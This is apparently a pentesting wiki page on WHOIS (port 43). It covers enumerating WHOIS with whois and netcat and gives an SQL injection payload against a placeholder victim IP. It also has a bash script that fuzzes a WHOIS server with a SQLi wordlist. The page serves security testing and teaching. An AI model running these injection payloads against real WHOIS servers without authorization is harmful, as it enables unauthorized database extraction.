WHOIS - Port 43

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁
Follow us on Twitter @VeryLazyTech, Github @VeryLazyTech, and Medium @VeryLazyTech.
Visit our shop for e-books and courses. 📚
Support us and buy me a coffee. ☕

Basic Information

WHOIS is a protocol used to query databases to obtain information about the registrants of various internet resources, including domain names, IP address blocks, and autonomous systems. It operates on a standard port and can be a key tool in information gathering during penetration testing.

Default port: 43

PORT   STATE  SERVICE
43/tcp open   whois

Enumerating WHOIS

To begin with WHOIS enumeration, you can query a WHOIS server to extract all available information about a domain:

whois -h <HOST> -p <PORT> "domain.tld"

Alternatively, you can also use netcat for the same purpose:

echo "domain.tld" | nc -vn <HOST> <PORT>

Database Information

Often, the WHOIS server responds with the name of the database being queried. This is useful information for further enumeration. It's important to remember that WHOIS services rely on databases to store and retrieve the information, which opens the possibility for SQL injection vulnerabilities.

Using the following query:

whois -h <Victim_ip> -p 43 "a') or 1=1#"

If the WHOIS server is vulnerable, you could extract all the information stored in the underlying database. This makes it essential to consider WHOIS as a potential vector for SQL injection attacks when testing.

Automate script for SQLi:

#!/bin/bash

# Variables
HOST="10.10.10.10"  # Change to the target IP
PORT="43"            # Default WHOIS port
WORDLIST="/usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt"  # Path to your SQLi wordlist

# Check if wordlist exists
if [[ ! -f "$WORDLIST" ]]; then
  echo "Wordlist not found!"
  exit 1
fi

# Loop through each payload in the wordlist
while IFS= read -r payload; do
  echo "Testing with payload: $payload"
  
  # Perform the WHOIS request with the current payload
  response=$(whois -h $HOST -p $PORT "$payload")
  
  # Check the response for SQLi indicators (change this according to the specific indicator you want)
  if echo "$response" | grep -qi "syntax error\|unexpected"; then
    echo "Possible SQLi detected with payload: $payload"
    echo "Response: $response"
    echo "-------------------------------------------"
  fi

done < "$WORDLIST"

echo "SQLi test completed."

Make the script executable:

chmod +x whois-sqli-tester.sh
./whois-sqli-tester.sh

PreviousSMTP/s - Port 25,465,587 NextTACACS+ - Port 49

Last updated 9 months ago

Was this helpful?